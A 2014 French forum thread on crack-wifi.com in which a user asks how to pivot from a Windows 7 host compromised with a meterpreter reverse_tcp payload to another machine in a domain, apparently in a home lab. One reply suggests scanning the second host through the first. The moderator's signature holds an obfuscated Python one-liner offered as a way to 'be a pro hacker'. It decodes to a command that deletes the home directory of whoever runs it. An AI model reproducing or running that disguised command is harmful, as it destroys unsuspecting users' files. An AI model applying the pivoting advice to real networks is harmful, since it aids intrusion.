Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-05-2014 15:07:17

shaft92
Membre
Inscription : 21-10-2013
Messages : 10

Attaque par rebond??

Bonjour,

Je souhaiteras avoir un peu d'éclaircissement concernant la propagation au sein d'un réseau d'entreprise:

Pour cela j'ai un domaine (contoso.com) 2 postes windows 7 qui sont joint à ce domaine ( win7-1 & win7-2)

Sur chacun de ces postes le propriétaire (l'utilisateur) est admin local (je sais c'est paaaas bien)

Grace à un PAYLOAD type "meterpreter reverse_tcp"  l'utilisateur de la machine win7-1 est infecté.Une connexion s'établie correctement sur ma machine de attaquante et me donne accès à cette machine.

Ma question est la suivante comment avec cette situation rebondir pour contaminer d'autres machines en interne sur le réseau de l'entreprise , en sachant que le pass the hash sur win7 nécessite soit la création d'une clé de registre sur le pc cible (win7-2), soit un compte de domaine ayant un droit d'admin local sur la machine cible (win7-2) ce qui n'est pas le cas de la machine infecté.
Même en utilisant des outils du type WCE les login et MDP seront ceux de l'utilisateur infecté (win7-1).

Comment contaminé l'autre machine ( win7-2) pour pouvoir avancé dans le réseau?

Merci

Dernière modification par shaft92 (20-05-2014 11:49:23)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-05-2014 18:39:01

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Attaque par rebond??

Question intéressante.
As-tu un contrôleur de domaine ?
(Rassures-moi, tu n'es pas entrain de pirater illégallement une entreprise ?)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 29-05-2014 19:59:08

shaft92
Membre
Inscription : 21-10-2013
Messages : 10

Re : Attaque par rebond??

Bonsoir,

Oui j'ai monté une architecture complète d'entreprise de façon à me retrouver dans un cas réel..Non non pas du tout cela à pour but la compréhension.

Hors Ligne

#4 29-05-2014 20:15:17

huibzh
N00b
Inscription : 29-05-2014
Messages : 4

Re : Attaque par rebond??

Bonsoir,

Je vais partir du principe que tu es en mode pentest et que tu ne connais rien de l'autre machine  sur le reseau.

La première chose que je ferais : un petit scan de la win7-2 via win7-1 (le zombie)
indice : http://nmap.org/man/fr/man-port-scannin … iques.html

Une foi le résultat du scan tombé dis nous si ça va mieux... ou pas.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]